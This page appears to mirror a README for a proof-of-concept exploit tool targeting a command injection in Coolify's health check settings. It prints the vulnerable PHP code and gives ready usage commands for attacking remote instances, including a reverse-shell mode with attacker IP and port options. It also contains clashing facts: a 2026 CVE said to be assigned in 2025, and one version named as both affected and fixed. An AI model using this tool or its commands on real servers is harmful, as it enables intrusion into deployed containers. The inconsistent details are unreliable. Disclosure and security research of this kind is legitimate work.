Share
## https://sploitus.com/exploit?id=C9D8D26E-43CB-5CB0-AF87-263E8FED095F
# ๐จ CVE-2026-59734 โ Coolify RCE Exploit
### OS Command Injection in Health Check โ Remote Code Execution
[](https://github.com/coollabsio/coolify/security/advisories/GHSA-4fhp-xqqp-w7vv)
[](https://nvd.nist.gov/vuln-metrics/cvss)
[](https://github.com/coollabsio/coolify/security/advisories/GHSA-4fhp-xqqp-w7vv)
[](#)
[](https://github.com/cybertechajju)
Proof-of-Concept exploit for OS Command Injection in Coolify's health check configuration.
Any authenticated user could execute arbitrary commands inside deployed containers.
---
## ๐ฏ About the Vulnerability
**[Coolify](https://coolify.io)** is a popular open-source, self-hosted deployment platform (30K+ GitHub stars) โ a free alternative to Heroku, Vercel, and Netlify.
A critical **OS Command Injection** vulnerability was discovered in Coolify's health check configuration. The `health_check_host`, `health_check_method`, and `health_check_path` parameters are directly interpolated into shell commands **without any sanitization**, allowing any authenticated user to execute arbitrary commands inside deployment containers.
```
โโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE ID โ CVE-2026-59734 โ
โ Type โ OS Command Injection (CWE-78) โ
โ Severity โ HIGH โ CVSS 8.8 โ
โ Attack Vector โ Network (Authenticated) โ
โ Affected โ Coolify = v4.0.0-beta.469 โ
โ Fix Commit โ 23f9156c7 โ
โ Reporter โ CyberTechAjju โ
โโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
๐ฅ Vulnerable Code (Click to expand)
```php
// app/Jobs/ApplicationDeploymentJob.php โ generate_healthcheck_commands()
// โ ๏ธ User input directly in shell command โ NO escapeshellarg()!
$generated_healthchecks_commands = [
"curl -s -X {$this->application->health_check_method} -f " .
"{$this->application->health_check_scheme}://" .
"{$this->application->health_check_host}:" .
"{$health_check_port}" .
"{$this->application->health_check_path} > /dev/null || exit 1",
];
```
---
## ๐ ๏ธ What This Tool Does
This PoC script validates and exploits CVE-2026-59734 with two modes:
| Mode | Description | Risk |
|:-----|:------------|:-----|
| `--local` | Simulates the vulnerable code pattern offline. **No network requests.** Tests all 3 injectable parameters + verifies the fix. | โ
Safe |
| `--remote` | Exploits a real Coolify instance via API. Injects payload into health check config and triggers deployment. | โ ๏ธ Auth required |
### Features
- ๐งช **4 Local Tests** โ Validates injection via `host`, `method`, `path` + confirms `escapeshellarg()` fix works
- ๐ **Auth Validation** โ Checks API token and permissions before attempting exploit
- ๐ **Version Detection** โ Detects Coolify version and warns if already patched
- ๐ฏ **Proof Tokens** โ Uses unique tokens to prevent false positives
- ๐ **Reverse Shell Mode** โ Built-in reverse shell payload with `--lhost` / `--lport`
- ๐งน **Cleanup Mode** โ Restores original health check config after exploitation
- ๐ก๏ธ **Injection Verification** โ Confirms server stored the payload unsanitized
---
## โก Quick Start
### Local Validation (Safe & Offline)
```bash
git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh
# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local
```
**Expected Output:**
```
โโโ LOCAL VULNERABILITY PATTERN VALIDATION โโโ
โโ Test 1: health_check_host injection
โ โ
VULNERABLE โ Injected command executed successfully
โโ Test 2: health_check_method injection
โ โ
VULNERABLE โ Method parameter also injectable
โโ Test 3: health_check_path injection
โ โ
VULNERABLE โ Path parameter also injectable
โโ Test 4: Verify that escapeshellarg() fixes the issue
โ โ
SAFE โ Sanitized input prevents injection
```
---
### Remote Exploit (Authorized Testing Only)
```bash
# Basic PoC โ writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID
# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--lhost YOUR_IP \
--lport 4444
# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--cleanup
```
---
## ๐ All Options
```
Usage:
Local Validation (safe, offline):
./coolify_healthcheck_rce_poc.sh --local
Remote Exploit (requires auth):
./coolify_healthcheck_rce_poc.sh --remote --url --token --uuid [OPTIONS]
Options:
--url Coolify instance URL (e.g. https://coolify.example.com)
--token API Bearer token
--uuid Target application UUID
--payload Custom injection payload
--lhost Attacker IP for reverse shell
--lport Attacker port for reverse shell (default: 4444)
--cleanup Restore original config after exploit
```
---
## ๐ How to Get API Token & App UUID
**API Token:**
1. Login to Coolify dashboard
2. Go to **Settings โ API Tokens**
3. Generate a new token
**App UUID:**
```bash
curl -s https://YOUR-COOLIFY/api/v1/applications \
-H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'
```
---
## ๐ Full Writeup
I wrote a detailed blog post explaining the entire discovery, exploitation, and lessons learned:
๐ **[How I Found an OS Command Injection (RCE) in Coolify โ Medium](https://medium.com/@cybertechajju/how-i-found-an-os-command-injection-rce-in-coolify-a93ffce24e74)**
---
## ๐ฅ Video Walkthrough
Watch the full exploitation demo on YouTube:
๐ **[CVE-2026-59734 โ Coolify RCE Demo โ YouTube](https://youtube.com/@cybertechajju)**
---
## โ
Timeline
| Date | Event |
|:-----|:------|
| **Jan 6, 2025** | ๐ Discovered & reported via GitHub Security Advisory |
| **Jan 16, 2025** | โ
Report accepted by Coolify maintainer |
| **Feb 24, 2025** | ๐ฌ Investigation confirmed |
| **Mar 18, 2025** | ๐ง Fix committed ([`23f9156c7`](https://github.com/coollabsio/coolify/commit/23f9156c7)) |
| **Apr 12, 2025** | ๐ฆ Fix released in v4.0.0-beta.469 |
| **Jul 2025** | ๐ท๏ธ CVE-2026-59734 assigned & advisory published |
---
## โ ๏ธ Legal Disclaimer
> **This tool is provided for EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.**
This PoC is intended for security researchers and bug bounty hunters to test systems they have **explicit, documented permission** to audit. Unauthorized use against systems you do not own is strictly prohibited and may violate local, state, and federal laws.
The author (**CyberTechAjju**) assumes no liability and is not responsible for any misuse or damage caused by this tool.
---
### ๐ More CVEs by CyberTechAjju
| CVE | Target | Type | Severity |
|:----|:-------|:-----|:---------|
| [CVE-2026-45156](https://github.com/cybertechajju/CVE-2026-45156) | Nextcloud user_oidc | JWT Signature Bypass | ๐ด Critical (9.8) |
| **CVE-2026-59734** | **Coolify** | **OS Command Injection** | **๐ High (8.8)** |
"They forgot to sanitize. I didn't forget to report."
๐ฎ๐ณ Hack the planet. ๐๐ป